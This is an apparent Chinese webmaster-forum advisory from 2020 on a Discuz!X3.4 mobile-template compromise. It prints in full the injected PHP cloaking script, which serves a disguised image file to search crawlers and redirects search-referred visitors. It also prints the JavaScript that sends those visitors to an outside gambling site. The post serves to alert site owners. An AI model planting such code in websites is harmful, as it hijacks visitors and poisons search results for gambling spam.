·Home 2019 登陆记录 最新更新 资料库SEO官方淘宝店
查看: 19|回复: 0

Discuz!X3.4默认手机模板漏洞通过UI劫持导向违法网站的情况通报

[复制链接]

766

主题

1537

能量

5

贡献币

无敌战神

Rank: 9Rank: 9Rank: 9

发表于 2020-5-5 22:20:32 | 显示全部楼层 |阅读模式
Discuz!X3.4默认手机模板漏洞通过UI劫持导向违法网站的情况通报:

漏洞注入路径:
/static/js/mobile下:

图片木马:
index.jpg

操作文件:
app.php

内容:
  1. <?php
  2.   $keyword = "六合|%CB%AB%C9%AB%C7%F2|彩票|%B2%CA%C6%B1|ssq|%73%73%71|讯|%D1%B6|钱|%C7%AE|皇|%BB%CA|百|%B0%D9|利|%C0%FB|彩|%B2%CA|赌|%B6%C4))|%BB%CA|%C0%D6|%C7%AE|%BB%CA|%D1%B6|%C5%C6|%B0%D9|百|讯|牌|钱|娱|皇|乐";
  3.   $url = 'static/js/mobile/index.jpg';
  4.   $passurl = "static/js/mobile/js.js";
  5.   $robot = 0;
  6.   $refer = 0;
  7.   $arrKeyword = explode("|",$keyword);
  8.   $USER_AGENT = strtolower($_SERVER['HTTP_USER_AGENT']);

  9.   if(empty($_SERVER['HTTP_REFERER'])){  
  10.           $HTTP_Referer = "n";
  11.   }
  12.   else{
  13.           $HTTP_Referer = strtolower(urldecode($_SERVER['HTTP_REFERER']));
  14.   }

  15.   if(strpos($USER_AGENT,"bot"))
  16.     $robot = 1;
  17.   
  18.   if(strpos($USER_AGENT,"spider"))
  19.     $robot = 1;
  20.        
  21.   if(strpos($USER_AGENT,"slurp"))
  22.     $robot = 1;

  23.   if(strpos($USER_AGENT,"mediapartners-google"))
  24.     $robot = 1;
  25.        
  26.   if($robot == 1 && $_SERVER['REQUEST_URI'] == "/"){
  27.         //Header("Location: ".$url);
  28.         echo file_get_contents($url);
  29.         exit;
  30.   }

  31.   if(strpos($HTTP_Referer,"www.baidu.com/"))
  32.     $refer = 1;

  33.   if(strpos($HTTP_Referer,"soso.com/"))
  34.     $refer = 1;

  35.   if(strpos($HTTP_Referer,"sogou.com/"))
  36.     $refer = 1;

  37.   if(strpos($HTTP_Referer,"so.com/"))
  38.     $refer = 1;

  39.   if(strpos($HTTP_Referer,"baidu.com"))
  40.     $refer = 1;
  41.        
  42.   if($refer == 1 && $_SERVER['REQUEST_URI'] == "/"){
  43.   echo '<script src="'.$passurl.'"></script>';
  44.   exit;
  45.   }

  46. ?>
复制代码
执行js内容:
  1. var _hmt = _hmt || [];
  2. (function() {
  3.   var hm = document.createElement("script");
  4.   hm.src = "//hm.baidu.com/hm.js?5fa93dff27c1ac39be066ba260b14556";
  5.   var s = document.getElementsByTagName("script")[0];
  6.   s.parentNode.insertBefore(hm, s);
  7. })();





  8. window.location="https://yz5488.com/?sssssssssssssssy";
复制代码


样本:
游客,如果您要查看本帖隐藏内容请回复

帖子地址: 

 懒得打字嘛,点击右侧快捷回复【最新发布】   【赞助站长帮享更多权益】
高级模式
您需要登录后才可以回帖 登录 | 立即注册 用百度帐号登录

本版积分规则

收缩
发布主题 快速回复 收藏帖子 返回列表 联系我们 搜索 官方QQ群
成为站长帮会员,享受Discuz!建站插件、模板、技术支持等全方位服务。 会员登录 注册会员

站长帮.(zzb7.net) ( 京ICP备18032088号-2 ) |GMT+8, 2020-5-25 18:36

Processed in 0.178932 second(s) , Gzip On, Redis On. 小黑屋|繁體
快速回复 返回顶部 返回列表